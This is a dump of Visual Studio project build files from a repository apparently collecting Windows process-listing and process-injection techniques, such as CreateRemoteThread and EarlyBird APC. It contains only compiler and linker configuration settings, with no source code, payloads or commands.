{8ffcde6b-2244-4579-a36c-0c0ba8b8b7ce} 25 | WTSApi 26 | 10.0 27 | 28 | 29 | 30 | Application 31 | true 32 | v143 33 | Unicode 34 | 35 | 36 | Application 37 | false 38 | v143 39 | true 40 | Unicode 41 | 42 | 43 | Application 44 | true 45 | v143 46 | Unicode 47 | 48 | 49 | Application 50 | false 51 | v143 52 | true 53 | Unicode 54 | 55 | 56 | 57 | 58 | 59 | 60 | 61 | 62 | 63 | 64 | 65 | 66 | 67 | 68 | 69 | 70 | 71 | 72 | 73 | 74 | true 75 | 76 | 77 | false 78 | 79 | 80 | true 81 | 82 | 83 | false 84 | 85 | 86 | 87 | Level3 88 | true 89 | WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions) 90 | true 91 | 92 | 93 | Console 94 | true 95 | 96 | 97 | 98 | 99 | Level3 100 | true 101 | true 102 | true 103 | WIN32;NDEBUG;_CONSOLE;%(PreprocessorDefinitions) 104 | true 105 | 106 | 107 | Console 108 | true 109 | true 110 | true 111 | 112 | 113 | 114 | 115 | Level3 116 | true 117 | _DEBUG;_CONSOLE;%(PreprocessorDefinitions) 118 | true 119 | 120 | 121 | Console 122 | true 123 | 124 | 125 | 126 | 127 | Level3 128 | true 129 | true 130 | true 131 | NDEBUG;_CONSOLE;%(PreprocessorDefinitions) 132 | true 133 | 134 | 135 | Console 136 | true 137 | true 138 | true 139 | 140 | 141 | 142 | 143 | 144 | 145 | 146 | 147 | 148 | 149 | 150 | -------------------------------------------------------------------------------- /Process ReadWrite/Attacker RW/Attacker RW.vcxproj: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | Debug 6 | Win32 7 | 8 | 9 | Release 10 | Win32 11 | 12 | 13 | Debug 14 | x64 15 | 16 | 17 | Release 18 | x64 19 | 20 | 21 | 22 | 16.0 23 | Win32Proj 24 | {eaf4dd74-916d-475d-a7de-bb1b7ab48e33} 25 | AttackerRW 26 | 10.0 27 | 28 | 29 | 30 | Application 31 | true 32 | v143 33 | Unicode 34 | 35 | 36 | Application 37 | false 38 | v143 39 | true 40 | Unicode 41 | 42 | 43 | Application 44 | true 45 | v143 46 | Unicode 47 | 48 | 49 | Application 50 | false 51 | v143 52 | true 53 | Unicode 54 | 55 | 56 | 57 | 58 | 59 | 60 | 61 | 62 | 63 | 64 | 65 | 66 | 67 | 68 | 69 | 70 | 71 | 72 | 73 | 74 | true 75 | 76 | 77 | false 78 | 79 | 80 | true 81 | 82 | 83 | false 84 | 85 | 86 | 87 | Level3 88 | true 89 | WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions) 90 | true 91 | 92 | 93 | Console 94 | true 95 | 96 | 97 | 98 | 99 | Level3 100 | true 101 | true 102 | true 103 | WIN32;NDEBUG;_CONSOLE;%(PreprocessorDefinitions) 104 | true 105 | 106 | 107 | Console 108 | true 109 | true 110 | true 111 | 112 | 113 | 114 | 115 | Level3 116 | true 117 | _DEBUG;_CONSOLE;%(PreprocessorDefinitions) 118 | true 119 | 120 | 121 | Console 122 | true 123 | 124 | 125 | 126 | 127 | Level3 128 | true 129 | true 130 | true 131 | NDEBUG;_CONSOLE;%(PreprocessorDefinitions) 132 | true 133 | 134 | 135 | Console 136 | true 137 | true 138 | true 139 | 140 | 141 | 142 | 143 | 144 | 145 | 146 | 147 | 148 | 149 | 150 | -------------------------------------------------------------------------------- /Process Listing/Tool Help32 Api/Tool Help32 Api.vcxproj: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | Debug 6 | Win32 7 | 8 | 9 | Release 10 | Win32 11 | 12 | 13 | Debug 14 | x64 15 | 16 | 17 | Release 18 | x64 19 | 20 | 21 | 22 | 16.0 23 | Win32Proj 24 | {ade2fa3e-b25c-47ca-8e12-ea6f87101aa6} 25 | ToolHelp32Api 26 | 10.0 27 | 28 | 29 | 30 | Application 31 | true 32 | v143 33 | Unicode 34 | 35 | 36 | Application 37 | false 38 | v143 39 | true 40 | Unicode 41 | 42 | 43 | Application 44 | true 45 | v143 46 | Unicode 47 | 48 | 49 | Application 50 | false 51 | v143 52 | true 53 | Unicode 54 | 55 | 56 | 57 | 58 | 59 | 60 | 61 | 62 | 63 | 64 | 65 | 66 | 67 | 68 | 69 | 70 | 71 | 72 | 73 | 74 | true 75 | 76 | 77 | false 78 | 79 | 80 | true 81 | 82 | 83 | false 84 | 85 | 86 | 87 | Level3 88 | true 89 | WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions) 90 | true 91 | 92 | 93 | Console 94 | true 95 | 96 | 97 | 98 | 99 | Level3 100 | true 101 | true 102 | true 103 | WIN32;NDEBUG;_CONSOLE;%(PreprocessorDefinitions) 104 | true 105 | 106 | 107 | Console 108 | true 109 | true 110 | true 111 | 112 | 113 | 114 | 115 | Level3 116 | true 117 | _DEBUG;_CONSOLE;%(PreprocessorDefinitions) 118 | true 119 | 120 | 121 | Console 122 | true 123 | 124 | 125 | 126 | 127 | Level3 128 | true 129 | true 130 | true 131 | NDEBUG;_CONSOLE;%(PreprocessorDefinitions) 132 | true 133 | 134 | 135 | Console 136 | true 137 | true 138 | true 139 | 140 | 141 | 142 | 143 | 144 | 145 | 146 | 147 | 148 | 149 | 150 | -------------------------------------------------------------------------------- /Process Injection/CreateRemoteThread DLL/CreateRemoteThread DLL.vcxproj: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | Debug 6 | Win32 7 | 8 | 9 | Release 10 | Win32 11 | 12 | 13 | Debug 14 | x64 15 | 16 | 17 | Release 18 | x64 19 | 20 | 21 | 22 | 23 | 24 | 25 | 26 | 27 | 28 | 16.0 29 | Win32Proj 30 | {4aeec15d-90b6-4040-bc62-2acf7ef347d8} 31 | CreateRemoteThreadDLL 32 | 10.0 33 | 34 | 35 | 36 | Application 37 | true 38 | v143 39 | Unicode 40 | 41 | 42 | Application 43 | false 44 | v143 45 | true 46 | Unicode 47 | 48 | 49 | Application 50 | true 51 | v143 52 | Unicode 53 | 54 | 55 | Application 56 | false 57 | v143 58 | true 59 | Unicode 60 | 61 | 62 | 63 | 64 | 65 | 66 | 67 | 68 | 69 | 70 | 71 | 72 | 73 | 74 | 75 | 76 | 77 | 78 | 79 | 80 | true 81 | 82 | 83 | false 84 | 85 | 86 | true 87 | 88 | 89 | false 90 | 91 | 92 | 93 | Level3 94 | true 95 | WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions) 96 | true 97 | 98 | 99 | Console 100 | true 101 | 102 | 103 | 104 | 105 | Level3 106 | true 107 | true 108 | true 109 | WIN32;NDEBUG;_CONSOLE;%(PreprocessorDefinitions) 110 | true 111 | 112 | 113 | Console 114 | true 115 | true 116 | true 117 | 118 | 119 | 120 | 121 | Level3 122 | true 123 | _DEBUG;_CONSOLE;%(PreprocessorDefinitions) 124 | true 125 | 126 | 127 | Console 128 | true 129 | 130 | 131 | 132 | 133 | Level3 134 | true 135 | true 136 | true 137 | NDEBUG;_CONSOLE;%(PreprocessorDefinitions) 138 | true 139 | 140 | 141 | Console 142 | true 143 | true 144 | true 145 | 146 | 147 | 148 | 149 | 150 | -------------------------------------------------------------------------------- /Process Listing/NT Query System Api/NT System Query.vcxproj: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | Debug 6 | Win32 7 | 8 | 9 | Release 10 | Win32 11 | 12 | 13 | Debug 14 | x64 15 | 16 | 17 | Release 18 | x64 19 | 20 | 21 | 22 | 16.0 23 | Win32Proj 24 | {03820352-f4d5-491f-bdac-999fac3cceb6} 25 | NTSystemQuery 26 | 10.0 27 | NT Query System Api 28 | 29 | 30 | 31 | Application 32 | true 33 | v143 34 | Unicode 35 | 36 | 37 | Application 38 | false 39 | v143 40 | true 41 | Unicode 42 | 43 | 44 | Application 45 | true 46 | v143 47 | Unicode 48 | 49 | 50 | Application 51 | false 52 | v143 53 | true 54 | Unicode 55 | 56 | 57 | 58 | 59 | 60 | 61 | 62 | 63 | 64 | 65 | 66 | 67 | 68 | 69 | 70 | 71 | 72 | 73 | 74 | 75 | true 76 | 77 | 78 | false 79 | 80 | 81 | true 82 | 83 | 84 | false 85 | 86 | 87 | 88 | Level3 89 | true 90 | WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions) 91 | true 92 | 93 | 94 | Console 95 | true 96 | 97 | 98 | 99 | 100 | Level3 101 | true 102 | true 103 | true 104 | WIN32;NDEBUG;_CONSOLE;%(PreprocessorDefinitions) 105 | true 106 | 107 | 108 | Console 109 | true 110 | true 111 | true 112 | 113 | 114 | 115 | 116 | Level3 117 | true 118 | _DEBUG;_CONSOLE;%(PreprocessorDefinitions) 119 | true 120 | 121 | 122 | Console 123 | true 124 | 125 | 126 | 127 | 128 | Level3 129 | true 130 | true 131 | true 132 | NDEBUG;_CONSOLE;%(PreprocessorDefinitions) 133 | true 134 | 135 | 136 | Console 137 | true 138 | true 139 | true 140 | 141 | 142 | 143 | 144 | 145 | 146 | 147 | 148 | 149 | 150 | 151 | -------------------------------------------------------------------------------- /Process Injection/EarlyBird APC/EarlyBird APC.vcxproj: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | Debug 6 | Win32 7 | 8 | 9 | Release 10 | Win32 11 | 12 | 13 | Debug 14 | x64 15 | 16 | 17 | Release 18 | x64 19 | 20 | 21 | 22 | 16.0 23 | Win32Proj 24 | {f725d431-7d99-429e-8e73-e7737669c302} 25 | EarlyBirdAPC 26 | 10.0 27 | 28 | 29 | 30 | Application 31 | true 32 | v143 33 | Unicode 34 | 35 | 36 | Application 37 | false 38 | v143 39 | true 40 | Unicode 41 | 42 | 43 | Application 44 | true 45 | v143 46 | Unicode 47 | 48 | 49 | Application 50 | false 51 | v143 52 | true 53 | Unicode 54 | 55 | 56 | 57 | 58 | 59 | 60 | 61 | 62 | 63 | 64 | 65 | 66 | 67 | 68 | 69 | 70 | 71 | 72 | 73 | 74 | true 75 | 76 | 77 | false 78 | 79 | 80 | true 81 | 82 | 83 | false 84 | 85 | 86 | 87 | Level3 88 | true 89 | WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions) 90 | true 91 | 92 | 93 | Console 94 | true 95 | 96 | 97 | 98 | 99 | Level3 100 | true 101 | true 102 | true 103 | WIN32;NDEBUG;_CONSOLE;%(PreprocessorDefinitions) 104 | true 105 | 106 | 107 | Console 108 | true 109 | true 110 | true 111 | 112 | 113 | 114 | 115 | Level3 116 | true 117 | _DEBUG;_CONSOLE;%(PreprocessorDefinitions) 118 | true 119 | $(SolutionDir)CreateRemoteThread DLL;%(AdditionalIncludeDirectories) 120 | 121 | 122 | Console 123 | true 124 | 125 | 126 | 127 | 128 | Level3 129 | true 130 | true 131 | true 132 | NDEBUG;_CONSOLE;%(PreprocessorDefinitions) 133 | true 134 | 135 | 136 | Console 137 | true 138 | true 139 | true 140 | 141 | 142 | 143 | 144 | 145 | 146 | 147 | 148 | 149 | 150 | 151 | -------------------------------------------------------------------------------- /Process Injection/CreateRemoteThread Shellcode/CreateRemoteThread Shellcode.vcxproj: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | Debug 6 | Win32 7 | 8 | 9 | Release 10 | Win32 11 | 12 | 13 | Debug 14 | x64 15 | 16 | 17 | Release 18 | x64 19 | 20 | 21 | 22 | 16.0 23 | Win32Proj 24 | {66704ff5-8962-42fa-8b22-51d207a0853f} 25 | CreateRemoteThreadShellcode 26 | 10.0 27 | 28 | 29 | 30 | Application 31 | true 32 | v143 33 | Unicode 34 | 35 | 36 | Application 37 | false 38 | v143 39 | true 40 | Unicode 41 | 42 | 43 | Application 44 | true 45 | v143 46 | Unicode 47 | 48 | 49 | Application 50 | false 51 | v143 52 | true 53 | Unicode 54 | 55 | 56 | 57 | 58 | 59 | 60 | 61 | 62 | 63 | 64 | 65 | 66 | 67 | 68 | 69 | 70 | 71 | 72 | 73 | 74 | true 75 | 76 | 77 | false 78 | 79 | 80 | true 81 | 82 | 83 | false 84 | 85 | 86 | 87 | Level3 88 | true 89 | WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions) 90 | true 91 | 92 | 93 | Console 94 | true 95 | 96 | 97 | 98 | 99 | Level3 100 | true 101 | true 102 | true 103 | WIN32;NDEBUG;_CONSOLE;%(PreprocessorDefinitions) 104 | true 105 | 106 | 107 | Console 108 | true 109 | true 110 | true 111 | 112 | 113 | 114 | 115 | Level3 116 | true 117 | _DEBUG;_CONSOLE;%(PreprocessorDefinitions) 118 | true 119 | $(SolutionDir)CreateRemoteThread DLL;%(AdditionalIncludeDirectories) 120 | 121 | 122 | Console 123 | true 124 | 125 | 126 | 127 | 128 | Level3 129 | true 130 | true 131 | true 132 | NDEBUG;_CONSOLE;%(PreprocessorDefinitions) 133 | true 134 | 135 | 136 | Console 137 | true 138 | true 139 | true 140 | 141 | 142 | 143 | 144 | 145 | 146 | 147 | 148 | 149 | 150 | 151 | -------------------------------------------------------------------------------- /Process Injection/APC Thread Injection/APC Thread Injection.vcxproj: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | Debug 6 | Win32 7 | 8 | 9 | Release 10 | Win32 11 | 12 | 13 | Debug 14 | x64 15 | 16 | 17 | Release 18 | x64 19 | 20 | 21 | 22 | 16.0 23 | Win32Proj 24 | {98ebcc7b-5e31-4d4f-9554-eb380f6773ab} 25 | APCThreadInjection 26 | 10.0 27 | 28 | 29 | 30 | Application 31 | true 32 | v143 33 | Unicode 34 | 35 | 36 | Application 37 | false 38 | v143 39 | true 40 | Unicode 41 | 42 | 43 | Application 44 | true 45 | v143 46 | Unicode 47 | 48 | 49 | Application 50 | false 51 | v143 52 | true 53 | Unicode 54 | 55 | 56 | 57 | 58 | 59 | 60 | 61 | 62 | 63 | 64 | 65 | 66 | 67 | 68 | 69 | 70 | 71 | 72 | 73 | 74 | true 75 | 76 | 77 | false 78 | 79 | 80 | true 81 | 82 | 83 | false 84 | 85 | 86 | 87 | Level3 88 | true 89 | WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions) 90 | true 91 | 92 | 93 | Console 94 | true 95 | 96 | 97 | 98 | 99 | Level3 100 | true 101 | true 102 | true 103 | WIN32;NDEBUG;_CONSOLE;%(PreprocessorDefinitions) 104 | true 105 | 106 | 107 | Console 108 | true 109 | true 110 | true 111 | 112 | 113 | 114 | 115 | Level3 116 | true 117 | _DEBUG;_CONSOLE;%(PreprocessorDefinitions) 118 | true 119 | $(SolutionDir)\CreateRemoteThread DLL;%(AdditionalIncludeDirectories) 120 | 121 | 122 | Console 123 | true 124 | 125 | 126 | 127 | 128 | Level3 129 | true 130 | true 131 | true 132 | NDEBUG;_CONSOLE;%(PreprocessorDefinitions) 133 | true 134 | 135 | 136 | Console 137 | true 138 | true 139 | true 140 | 141 | 142 | 143 | 144 | 145 | 146 | 147 | 148 | 149 | 150 | 151 | 152 | --------------------------------------------------------------------------------